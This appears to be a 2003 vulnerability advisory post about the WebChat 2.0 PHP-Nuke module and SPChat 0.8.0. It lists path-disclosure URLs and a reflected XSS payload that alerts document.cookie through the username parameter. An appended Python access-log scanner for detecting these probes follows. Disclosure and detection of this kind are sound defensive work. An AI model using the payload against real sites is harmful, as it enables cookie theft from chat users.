Web Chat 2.0 for PHP-Nuke & SPChat 0.8.0 Vulnerabilities

CourtneyDS

Vulnerability Type : XSS (Cross Site Scripting).. Path Disclosure.. DB user name revealed.. possible SQL injection ...

SPChat & WebChat are very good and stable systems of chat online.. but they indeed have their faults ...

Our findings prior to notifying the source writer along with our associates around the web ...

Warning : Access denied for user: you@localhost (Using password: YES) in /home/virtual/site3/fst/var/www/html/modules/WebChat/inc/mysql.lib.php

DataBase error will read : Link_ID == false, connect failed ...

MySQL error : 0 () Session halted ...

Path disclosure :

http://www.you.com/modules/WebChat/in.php
http://www.you.com/modules/WebChat/quit.php
http://www.you.com/modules/WebChat/users.php
http://www.you.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code]
http://www.you.com/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=">alert(document.cookie);

Solution :

To Fix the script temporarily.. you must erase this script off your Web.. or change its name so that nobody has access to it ... You have to search the site of the writer / programmer in search of the new patch.. to be able to continue using this chat ...

This information was released only yesterday 06 - 02 - 03 and there is no immediate patch available ...

Sincerely
CourtneyDS
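
A log check for the request patterns shown in the post, as an added example that is not part of the original post or of either chat project: it scans web-server access-log lines for requests to the WebChat scripts where rid or uid is not a plain non-negative integer or username carries markup characters. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Script names and module path are taken from the URLs in the post.
WEBCHAT = re.compile(r"^/modules/WebChat/(in|quit|users)\.php$", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r"[<>\"']")

def check_request(target):
    """Return the reasons a request target looks like a probe (empty list = clean)."""
    try:
        url = urlsplit(target)
    except ValueError:
        return []
    if not WEBCHAT.match(url.path):
        return []
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    reasons = []
    for name in ("rid", "uid"):
        for value in params.get(name, []):
            if not (value.isascii() and value.isdigit()):
                reasons.append(f"{name} is not a non-negative integer: {value!r}")
    for value in params.get("username", []):
        if MARKUP.search(value):
            reasons.append(f"username carries markup characters: {value!r}")
    return reasons

def scan(lines):
    """Yield (line_number, target, reasons) for each suspicious access-log line."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        reasons = check_request(match.group(1)) if match else []
        if reasons:
            yield number, match.group(1), reasons

# Constructed sample lines (documentation-range addresses, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2003:10:00:01 +0000] "GET /modules/WebChat/users.php?rid=1&uid=7&username=alice HTTP/1.0" 200 812',
    '192.0.2.44 - - [01/Jan/2003:10:00:09 +0000] "GET /modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=test HTTP/1.0" 200 640',
    '192.0.2.44 - - [01/Jan/2003:10:00:15 +0000] "GET /modules/WebChat/users.php?rid=2&uid=7&username=%22%3Ealert(document.cookie); HTTP/1.0" 200 655',
    '192.0.2.71 - - [01/Jan/2003:10:01:02 +0000] "GET /index.php?username=%3Cb%3E HTTP/1.0" 200 5120',
]

if __name__ == "__main__":
    for number, target, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {target}\n  " + "\n  ".join(reasons))
```

If the module is installed under a different path, adjust the `WEBCHAT` pattern to match.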